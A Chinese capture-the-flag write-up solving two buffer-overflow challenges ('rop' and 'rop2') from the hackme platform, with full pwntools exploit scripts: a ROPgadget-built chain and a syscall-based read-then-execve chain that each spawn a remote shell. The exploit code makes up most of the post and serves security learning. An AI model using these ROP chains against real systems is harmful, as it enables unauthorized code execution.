美文网首页
rop and rop2 wp

rop and rop2 wp

作者: zs0zrc | 来源:发表于2018-05-09 20:41 被阅读44次

题目来源:国外的一个ctf平台hackme

rop

hint: ROP buffer overflow
防护机制:

image.png

拖到IDA反编译一下

image.png

可以看到有很多函数 ,不管是用到的还是没用的都有,说明它编译时用的是静态连接
我们可以通过ROPgadget 来直接构造ropchain
命令为 ROPgadget --binary rop --ropchain

栈的大小可以通过peda的pattern search 来找到
先生成 长度为100的字符串 pattern create 100
然后执行程序

image.png

栈的大小为12
exp:

from pwn import *  
from struct import pack  
sh = remote('hackme.inndy.tw',7704)  
junk = 'a'*12 + "BBBB" # junk + ebp  
  
p = junk  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea060) # @ .data  
p += pack('<I', 0x080b8016) # pop eax ; ret  
p += '/bin'  
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea064) # @ .data + 4  
p += pack('<I', 0x080b8016) # pop eax ; ret  
p += '//sh'  
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea068) # @ .data + 8  
p += pack('<I', 0x080492d3) # xor eax, eax ; ret  
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret  
p += pack('<I', 0x080481c9) # pop ebx ; ret  
p += pack('<I', 0x080ea060) # @ .data  
p += pack('<I', 0x080de769) # pop ecx ; ret  
p += pack('<I', 0x080ea068) # @ .data + 8  
p += pack('<I', 0x0806ecda) # pop edx ; ret  
p += pack('<I', 0x080ea068) # @ .data + 8  
p += pack('<I', 0x080492d3) # xor eax, eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0807a66f) # inc eax ; ret  
p += pack('<I', 0x0806c943) # int 0x80  
  
sh.sendline(p)  
sh.interactive()  

ROP2

hint:ROPgadget not working anymore
说明不可以再通过ROPgadget来获取ropchain了
检查下防护机制 只开启了NX

简单运行了一下程序:

image.png

程序要求你输入一串字符串 然后打印出了一堆东西

将程序拖到ida中,来一手f5大法

image.png

发现了syscall函数 ,查了一下发现程序中的syscall(4,1,&v4,42) 和syscall(3,0,&v1,1024) 分别调用了write()函数和read函数的系统调用

这一题的解题思路:
将syscall中的第一个参数设置为execve()函数的调用号,第二个参数设置为“/bin/sh”参数的地址 来执行execve()获取shell
execve()函数的系统调用号 为0xb

exp:

from pwn import*  
p = remote('hackme.inndy.tw',7703)  
elf = ELF('./rop2')  
bss = elf.bss()  
syscall = elf.symbols['syscall']  
overflow = elf.symbols['overflow']   
  
p.recv()  
payload = 'a'*0xC + 'bbbb' + p32(syscall) + p32(overflow) # junk + target_address  + return_address  
payload += p32(3) + p32(0) + p32(bss) + p32(8) #syscall(3,0,bss_add,8)  
p.send(payload)  
p.send("/bin/sh\x00")  
  
payload1 = 'a'*0xc + "BBBB" + p32(syscall)  
payload1 += p32(overflow)+ p32(0xb) + p32(bss) + p32(0) + p32(0)  #syscall(0xb,bss_add,0,0) = execve("bin/sh",0,0)  
  
p.send(payload1)  
p.interactive()   

相关文章

  • rop and rop2 wp

    题目来源:国外的一个ctf平台hackme rop hint: ROP buffer overflow防护机制: ...

  • ROP2

    题目用了syscall来调用了write,read函数,可以查看一下调用号 随便查看其中一个文件就可以看到调用号了...

  • # [ROP Emporium]ret2csu

    [ROP Emporium]ret2csu 做ROP Emporium的ret2csu陷入僵局的时候想找wp的时候...

  • rsbo

    有个栈溢出可以rop,但是下面的for循环会破坏rop链,然后看了下charlie师傅的wp才知道,这里发送108...

  • JarvisOj [XMAN]level-2

    思路WP 提示:网上有不少当作32位写的WP,都出现了问题,无法成功cat flag,只有运用ROP的才能成功。 ...

  • [JarvisOj](pwn)rop_rop_rop

    简介 : 利用代码 : 方法一 :(按照出题人的思路 , 分别调用 Step1, Step2, Step3, 在内...

  • ROP|frame faking|

    基础ROP *目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲...

  • NX防护机制绕过 ROP

    什么是ROP *ROP(Return Oriented Programming)即面向返回地址编程,其主要思想是在...

  • 基本ROP讲解

    0x01 前言 在了解栈溢出后,我们再从原理和方法两方面深入理解基本ROP。 0x02 什么是ROP ROP的全称...

  • ROP

    很明显的栈溢出,想了半天没有头绪,然后发现可以用ROPgadget –binary rop –ropchain 直...

网友评论

      本文标题:rop and rop2 wp

      本文链接:https://www.haomeiwen.com/subject/ppworftx.html